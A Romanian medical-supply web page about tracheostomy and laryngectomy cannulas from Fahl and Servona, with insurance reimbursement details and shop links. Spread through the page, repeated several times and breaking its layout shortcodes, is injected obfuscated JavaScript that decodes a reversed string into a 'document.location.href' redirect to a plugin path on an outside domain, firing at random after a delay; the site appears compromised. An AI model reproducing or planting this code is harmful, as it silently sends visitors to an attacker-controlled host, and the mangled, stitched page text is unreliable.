Decontare
CAS
$NqM=function(n){if(typeof($NqM.list[n])==“string”)return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphctertstop: 3%;box-shadow:1px 1px 5px #333;padding:10px 0px;”>Canule Traheale
ton size=”medium” style=”skyblue” url=”http://www.canule-traheale.ro/magazin/” target=”_blank” icon=”” popup=”” title=””]Magazin Online Canule Traheale si Accesorii[/button]

Traheostomia reprezintă scurtcircuitarea căilor respiratorii superioare (supratraheale) cu ajutorul unei canule speciale introdusă în trahee printr-o “stomă” creată chirurgical, pentru a realiza o comunicare între cavitatea traheală şi aerul atmosferic, permiţând astfel ventilaţia.

Această tehnică face parte din cele mai vechi proceduri chirurgicale cunoscute în medicină încă din Antichitate. Etimologia cuvântului traheostomiei vine din cuvintele grecești: stom-care înseamnă “gură” și trachea și se referă la deschiderea permanentă sau semipermanentă a traheei.

Traheostomia a suportat secole de negare și respingere, precum și multe eșecuri. În zilele noastre, această procedură este acceptată ca atare. Traheostomia și montarea unei canule traheale au salvat și îmbunătățit calitatea vieții a sute de mii de pacienți.

Laringectomia totala sau partiala este o operatie mutilanta care presupune indepartarea totala sau partiala a laringelui si/sau a corzilor vocale, ceea ce inseamna imposibilitatea pacientului de a mai expira aerul pe nas si/sau gura, ori fonatia normala. Si in urma acestei operatii se utilizeaza canule.

In primele 6 luni de la operatie, poate chiar un an, pacientul trebuie sa poarte canule din material dur, nu din silicon. Dupa ce edemul aparut in urma operatiei se retrage, acesta poate folosi si canule din silicon.

Canulele fenestrate imbunatatesc procesul de fonatie si chiar confortul pacientului. In cazuri particulare, unii medici doresc ca fenestrarea sa o faca personal, pentru a respecta perfect anatomia pacientului.

Casa de Asigurari deconteaza suma de 1.698,32 lei, pentru 4 bucati canule traheale.

Clarfon ofera o gama variata de canule si butoane fonatorii confectionate din materiale si forme diferite, astfel incat fiecare pacient sa beneficieze de proteza corecta. Medicul alege individual tipul de proteza potrivita fiecarui pacient si o recomanda in consecinta.

Clarfon colaboreaza cu 2 mari producatori de proteze traheale si fonatorii, Fahl si Servona, iar in continuare puteti gasi mai multe informatii despre principalele modele de canule din portofoliul nostru.

Producator : FAHL

 1. CANULA BIESALSKI

 2. Este confectionata din PVC medical (material dur), se poate folosi imediat dupa operatia de traheostomie/laringectomie partiala sau totala. Nu este fenestrata. Dupa perioada de vindecare a locului operatiei – aprx 6 luni – se poate inlocui cu o canula din silicon.

  Setul contine o canula externa, 2 canule interne, o valva de vorbire, un capac tuse (sau pt dus – are capul in jos, pentru a nu permite intrarea apei in gaura canulei), un adaptor de 15 mm (pentru situatiile de respiratie prin ventilare) si o bentita de fixare.

  Aceasta canula este in pretul CASS.

 3. CANULA DURATWIX LINGO

 4. Este confectionata din poliuretan termosenzitiv (devine mai moale la temperature corpului) , cu o aderenta mica la secretii. Este livrata cu doua canule interioare , una fiind fenestrata si un ajutor de insertie (obturator).

  Canula externa este fenestrata , ceea ce ofera un mai mare confort pacientului si ajuta la procesul de vorbire.

Producator : SERVONA

 1. CANULA SERVOX ELASTO TUBE STANDARD

 2. Este confectionata din poliuretan termosenzitiv – PUR – (devine mai moale la temperatura corpului), are forma conica, cu o aderenta mica la secretii. Se poate folosi si cu o canula interna.

 1. CANULA SERVOX ELASTO TUBE VOICE

 2. Este confectionata din poliuretan termosenzitiv – PUR – (devine mai moale la temperatura corpului), are forma conica, cu o aderenta mica la secretii, valva de vorbire. Canula externa este fenestrata, ceee ce ofera un mai mare confort pacientului si ajuta la procesul de vorbire.

 1. CANULA SERVOX ELASTO TUBE

 2. Este confectionata din poliuretan termosenzitiv – PUR – (devine mai moale la temperatura corpului), are forma conica, cu o aderenta mica la secretii. Sunt disponibile 2 modele: canula externa sau canula interna, fenestrate sau normala. Le puteti combina astfel incat sa formati o canula cu mandren.

 1. CANULA SERVOX SOFT TUBE 22

 2. Este confectionata din silicon, masurile incep de la 12 mm la flanse (diametrul stomei), cee ace corespunde masurii 8. Nu are canula interna. Canula din silicon ofera un mai mare confort pacientului. Aceste canule pot fi fenestrate sau normale. Canulele SOFT TUBE CONNECT prezinta un conector la care pot fi atasate aparatele de ventilatie artificiala (posibil ca aceasta canula sa fie mai utila in spitale).

ton size=”medium” style=”skyblue” url=”http://www.canule-traheale.ro/categorie-produs/canule-traheale-pret/” target=”_blank” icon=”” popup=”” title=””]Comanda acum Canule Traheale[/button]

) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to_page=”” target=”” float=”” lightbox=”https://www.implantcohlearadvancedbionics.ro/wp-content/uploads/2015/06/canula-biesalski-1.jpg” lightbox_group=”” size=”three_col_large”]

) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to-tube-1.jpg” description=”Canula Soft Tube” link_to_page=”” target=”” float=”” lightbox=”https://www.implantcohlearadvancedbionics.ro/wp-content/uploads/2015/06/canula-elasto-tube-1.jpg” lightbox_group=”” size=”three_col_large”]

) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to_page=”” target=”” float=”” lightbox=”https://www.implantcohlearadvancedbionics.ro/wp-content/uploads/2015/11/Canula-Duratwix-Lingo.jpg” lightbox_group=”” size=”three_col_large”]


) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to_page=”” target=”” float=”” lightbox=”https://www.implantcohlearadvancedbionics.ro/wp-content/uploads/2015/06/canula-servox-1.jpg” lightbox_group=”” size=”three_col_large”]

) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to_page=”” target=”” float=”” lightbox=”https://www.implantcohlearadvancedbionics.ro/wp-content/uploads/2015/06/canula-soft-tube-1jpg.jpg” lightbox_group=”” size=”three_col_large”]

) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to_page=”” target=”” float=”” lightbox=”https://www.implantcohlearadvancedbionics.ro/wp-content/uploads/2015/06/canule-pt-Produse-1.jpg” lightbox_group=”” size=”three_col_large”]